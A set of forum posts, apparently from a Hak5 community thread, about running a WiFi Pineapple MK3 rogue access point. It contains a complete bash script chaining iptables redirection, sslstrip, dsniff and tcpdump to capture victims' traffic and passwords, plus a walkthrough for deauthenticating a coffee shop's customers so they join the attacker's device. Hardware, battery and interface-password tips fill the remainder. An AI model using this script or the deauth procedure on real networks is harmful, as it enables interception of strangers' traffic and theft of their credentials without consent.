itsm0ld

It would have to be a separate wireless card from the one providing internet to the pineapple or anything really since it needs to be in monitor mode. I would recommend one of the alpha USB wifi adapters the hak shop sells, I have several with me all the time, or if you have an android phone I use a simple app called wifi analyzer I think. It doesn't do much but it does give me the BSSID of AP's close, it also looks less suspicious

I believe the issue with running airmon on the pineapple is that the wireless card cant be in monitor mode and have karma enabled at the same time...believe karma needs to be in master mode.

Confirmed working on 1.0.2 Anyone else get this working or did I just ramble on

Make sure you copy and paste that text into a file called p3.sh or whatever just with a .sh extension, then to run it simple type ./p3.sh from a terminal window.

Ok here is my basic script it gives me a live view of SSL Strip activity and does a full packet capture later to use with network miner, wireshark etc etc: #!/bin/bash # #Pineapple script by m0ld 2011 v3 # # IPtables setup echo "[+] Setting IPtables" echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 sleep 2 cd /root/captures/ touch sslstrip.log # Dsniff echo "[+] Starting Dsniff" echo xterm -geometry 25x15x1+625 -T Dsniff -e dsniff -i eth0 -w /root/captures/dsniff.log & dsniffid=$! sleep 1 # Tcpdump echo "[+] Starting TCPdump" echo xterm -geometry 30x15x100 -T Tcpdump -e tcpdump -ni eth0 -w /root/captures/tcpdump.pcap & tcpdumpid=$! sleep 1 # Sslstrip echo "[+] Starting sslstrip..." echo xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$! echo xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$! sleep 2 clear echo echo "[+] IMPORTANT..." echo "After you have finished please clean up properly by hitting Y" echo "if Pineapple is not closed properly ERRORS WILL OCCUR " read WISH # Clean up if [ $WISH = "y" ] ; then echo echo "[+] Cleaning up" kill ${sslstripid} kill ${sslstriplogid} kill ${dsniffid} kill ${tcpdumpid} sleep 1 rm dsniff.services echo "[+] Cleaning up iptables..." echo "0" > /proc/sys/net/ipv4/ip_forward iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain exit fi exit This script assumes the interface providing the internet connection is eth1 and that the interface connected via cable to the pineapple is eth0 Also you will want to create a folder /root/captures it saves the SSL strip log and the tcpdump files in this folder for later review. If that's not the case for you simply replace the eth1, and eth0 with whatever they are in your case. As a note this script opens several terminal windows so you can see the sslstrip log in real time, it also saves a full packet capture via tcpdump for mining later. Lastly you will notice that it keeps the original terminal window open and tells you you need to clean up, when you are done running the script simply hit the Y key and the script will clean up and close all the terminal windows. It does NOT delete the SSL strip logs or tcpdump files stored in /root/captures however if your dont move the files or rename them before you run the script again it will overwrite them. Test it out and let me know what you think.

SSL strip will run against ALL clients since you will be running it on the laptop against the Ethernet interface connected to your pineapple. And like we said no arpspoof required =)

Yes "Are you indicating that the MAC that's showing associated with "Schnieder" is actually a MAC of a client connected to "Schnieder", and not of the "Schnieder" AP itself?" is correct. Using your log as an example its saying: client MAC: 00:16:a4:fe:08:ab connected to your pineapple responding to the AP name of Schnieder.

If your using BT5 iptables should clear after a reboot, also since you are MITM there is no need to use arpspoof since you actually are the gateway ;) I think arpspoof may be whats borking your tests. EDIT: This is the cleanup part of my script for iptables iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain

From my experience once karma has been enabled and then disabled the regular wireless interface does not come back up until the device is rebooted. This happens on both the new MK3's (ap51's) I own.

I think you are using the tool wrong. Since the client already connected to you why would you deauth it you already have the victim? Basically you need the BSSID of the AP you want to attack not a client...does that make sense? Lets pretend we are trying to get clients from a local coffee shop: Coffee shop AP SSID: java Coffee shop AP BSSID: 01:02:a4:2g:21:a3 One coffee shop customer is on the wireless MAC is: aa:bb:cc:dd:ee:ff Now you have your Pineapple setup next door and karma is up and running...but you want the coffee shop customer so lets deauth them! In this case you would enter the Coffee shops AP BSSID (01:02:a4:2g:21:a3) into the MK3 interface and hit deauth. This will cause the customer to be disconnected from the actual AP and hopefully connect to your pineapple. Basically I see two issues with what your doing: 1) your trying to deauth a client that is already associated to you so no need 2) you will need to get the BSSID of the actual AP with another tool like airmon-ng on your laptop. You will never be able to get the actual BSSID from the association log becasue it is showing you what the CLIENTS mac is and what AP it thinks its connecting to....not what the AP's BSSID is. Does that make sense?

I replied to another of your posts but unless you are doing a phishing attack you will want SSL strip to get HTTPS passwords. Remember the traffic is encrypted between the victims browser and the website so even being MITM you need a tool like SSL strip.

Have you looked at the wp3 script? It will take you through all the steps needed to get get internet sharing and routing setup in backtrack. From that point SSL strip is setup just like has been described many times and since it will be running on your laptop you wont have the space limitations of the pineapple. If your interested I can post up the script I use with my pineapples, its a little more work to get working but it has tcpdump to log all packets for offline mining , SSL strip, and also takes care of the ip forwarding and internet sharing in BT5 R1.

I actually thought I had a problem with the association log when I first got the MK3 using firefox. I found that if I use chrome I don't have any problems in the interface however I still cant see some of the fields when I use Firefox, not sure why but I would try switching browsers first, its not hard and easy to check.

Let me clarify. Its actually to a floating charger not just a outlet plug lol

I have never used a cross over cable but my laptop NIC may be auto crossing..it wont hurt anything it may just not work.

I actually wired the plug that came with the external HDD directly to the battery, the switch simply removed both the positive and negative wires to the fon just to make sure it doesn't get to much voltage from the charger. The charger I picked up from the local electronics store and just cut the end off the HDD power cable and attached it to the charger.

Its a pack that I made up using five 1.2v rechargeable AA sized cells...don't remember what the brand was but I got them from the local batteries plus. I just wired them together in series to get 6 volts then just shrunk tubed the whole thing. It is rechargeable however if I was going to do it again I would use Li-Ion rather than NiMH just so it will hold its charge longer when not in use. (I leave this in the work car and dig it out when I want to play with it). I typically get 3-4 hours of use out of this configuration with karma on and the Ethernet port connected. Since this post I have actually added a switch that can be activated from the outside with a bent paperclip to turn it on or off and in the off position I can plug it in and it will charge the battery saving me from having to open and close the case every time.

I dont remember the exact location but you can find it by issuing the command: find / -name ngrep.sh

If you don't need to flash the firmware here is my How-To: http://forums.hak5.org/index.php?showtopic=24397

This is another improvement I wanted to make after I got my MK3 when testing, securing the /pineapple web interface with a password so here is how to do it! SSH to your MK3 (default IP is 172.16.42.1) Lets create the first file: touch /etc/httpd.conf Now lets add the /pineapple prefix to secure using nano: nano /etc/http.conf (file should be empty) Add the following: /pineapple:admin:$p$root This defines the page to secure in this case /pineapple, then the username in this case admin, then it looks to the root users password (whatever you set, default is pinepplesareyummy) Close and save the changes. Now we need to edit the /etc/config/uhttpd to use the httpd.conf nano /etc/config/uhttp Scroll down to the section called: # Configuration file in busybox httpd format un-comment the following line to look like: option config /etc/httpd.conf Close and save changes. Lastly we need to restart uhttpd to make the changes active: /etc/init.d/uhttpd stop /etc/init.d/uhttpd start Now if you browse to http://172.16.42.1/pineapple it will prompt you for a username and password. Hope this helps!

I have been tasked to implement a helpdesk system, I have looked at Zen desk and Kayako...looking for suggestions on what you guys are using.

I don't have a immediate use for this but I can see the usefulness of this, so if you don't mind keeping this post alive I for one am interested in following it.

Yes using the web interface you can change the default SSID.

You can in fact connect to the pineapple interface from any victim.

If you do get a little button setup I would be interested in it also =)